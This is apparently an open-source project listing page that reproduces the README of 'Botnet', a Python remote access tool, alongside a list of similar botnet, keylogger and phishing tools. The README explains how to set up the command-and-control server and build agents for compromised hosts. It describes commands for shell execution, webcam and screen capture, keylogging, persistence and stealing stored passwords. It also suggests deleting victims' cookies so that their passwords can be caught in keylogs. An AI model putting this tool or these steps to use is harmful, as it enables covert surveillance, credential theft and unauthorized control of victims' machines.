All Projects → frederikme → Botnet

frederikme / Botnet

Licence: other
Remote Access Tool, Command & Control, based on the github project Ares, but written in python 3 with some extra features.

Programming Languages

python
139335 projects - #7 most used programming language
HTML
75241 projects
javascript
184084 projects - #8 most used programming language
CSS
56736 projects

Projects that are alternatives of or similar to Botnet

Brutus
Botnet targeting Windows machines written entirely in Python & open source security project.
Stars: ✭ 37 (+42.31%)
Mutual labels:  botnet, hacking-tool
paradoxiaRAT
ParadoxiaRat : Native Windows Remote access Tool.
Stars: ✭ 583 (+2142.31%)
Mutual labels:  botnet, hacking-tool
Paradoxiarat
ParadoxiaRat : Native Windows Remote access Tool.
Stars: ✭ 395 (+1419.23%)
Mutual labels:  botnet, hacking-tool
Teardroid-phprat
🇮🇳 🤖 It's easy to use android botnet work without port forwarding, vps and android studio
Stars: ✭ 417 (+1503.85%)
Mutual labels:  botnet, hacking-tool
Brutus
A Python-powered exploitation framework and botnet.
Stars: ✭ 17 (-34.62%)
Mutual labels:  botnet, hacking-tool
Storm-Breaker
Social engineering tool [Access Webcam & Microphone & Location Finder] With Python
Stars: ✭ 1,489 (+5626.92%)
Mutual labels:  hacking-tool
hackarsenaltoolkit
Hacking arsenal. This script download the latest tools, wordlists, releases and install common hacking tools
Stars: ✭ 39 (+50%)
Mutual labels:  hacking-tool
Aliens eye
Social media hunter
Stars: ✭ 105 (+303.85%)
Mutual labels:  hacking-tool
winagent
Windows agent for Tactical RMM
Stars: ✭ 20 (-23.08%)
Mutual labels:  botnet
fleex
Fleex makes it easy to create multiple VPS on cloud providers and use them to distribute workloads.
Stars: ✭ 181 (+596.15%)
Mutual labels:  hacking-tool
OrionServer
An open-source, centralized HTTPS botnet
Stars: ✭ 58 (+123.08%)
Mutual labels:  botnet
EMAGNET
Automated hacking tool that will find leaked databases with 97.1% accurate to grab mail + password together from recent uploads from https://pastebin.com. Bruteforce support for spotify accounts, instagram accounts, ssh servers, microsoft rdp clients and gmail accounts
Stars: ✭ 1,427 (+5388.46%)
Mutual labels:  hacking-tool
uberducky
Wireless USB Rubber Ducky triggered via BLE (make your Ubertooth quack!)
Stars: ✭ 80 (+207.69%)
Mutual labels:  hacking-tool
Black-Tool
Install the tools and start Attacking , black-tool v5.0 ! ⬛
Stars: ✭ 239 (+819.23%)
Mutual labels:  hacking-tool
phishEye
phishEye is an ultimate phishing tool in python. Includes popular websites like Facebook, Twitter, Instagram, LinkedIn, GitHub, Dropbox, and many others. Created with Flask, custom templates, and tunneled with ngrok and localhost.run.
Stars: ✭ 47 (+80.77%)
Mutual labels:  hacking-tool
Lo0sR
Lo0sR is a simple python Keylogger with many functions.
Stars: ✭ 48 (+84.62%)
Mutual labels:  hacking-tool
reosploit
A Tool that Finds, Enumerates, and Exploits Reolink Cameras.
Stars: ✭ 89 (+242.31%)
Mutual labels:  hacking-tool
Web-Tracker
Stand alone program that Tracks/Logs all the opened websites in the Chrome Browser. Even incognito! *No need to install anything in browser*
Stars: ✭ 34 (+30.77%)
Mutual labels:  hacking-tool
rust botnet
Telegraph botnet written in Rust
Stars: ✭ 15 (-42.31%)
Mutual labels:  botnet
redteamwiki
redteam.wiki
Stars: ✭ 75 (+188.46%)
Mutual labels:  hacking-tool

Botnet

Botnet is a Python3 Remote Access Tool.

Warning: Misuse of this software can raise legal and ethical issues which I don't support nor can be held responsible for.

Botnet is, just like Ares, made of two programs:

  • A Command And Control server which is a web interface to administer the agents
  • An agent program, which is run on the compromised host, and ensures communication with the C&C

Based on Github project Ares: https://github.com/sweetsoftware/Ares

Differences?

  1. Updated from python 2 -> python 3
  2. Extra features like screencaptures, webcam capture, keylogger, password grabber (websites and wifi), ...

Setup

Note: I suggest creating a virtual environment

Install the python requirements:

pip install -r requirements.txt

Initialize the database:

cd Server
./server initdb

Server

Run the (debug) server:

./server.py runserver -h 0.0.0.0 -p 8080 --threaded

The server must now be accessible on http://localhost:8080

Agent

Run the agent (update config.py to suit your needs):

cd agent
./agent.py

Build an agent to a standalone library and run it:

./builder.py -p Linux --server http://localhost:8080 -o agent
./agent

To see a list of supported options run

./builder.py -h

Commands

<any shell command>
Executes the command in a shell and return its output.

upload <local_file>
Uploads <local_file> to server.

download <url> <destination>
Downloads a file through HTTP(S).

zip <archive_name> <folder>
Creates a zip archive of the folder.

python <command|file>
Runs a Python command or local file.

screenshot
Takes a screenshot and uploads the image to server.

camshot
Takes a webcam image and uploads the image to server.

keylogger
Shows all pressed keys since start up.

passwords
Shows all stored passwords on the pc, including websites and wifi.

delete passwords
Deletes all stored cookies from the victims' pc. 
This way you could try to retreive password from keylogs if you cannot get them from the passwords command.

persist
Installs the agent.

clean
Uninstalls the agent.

exit
Kills the agent.
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].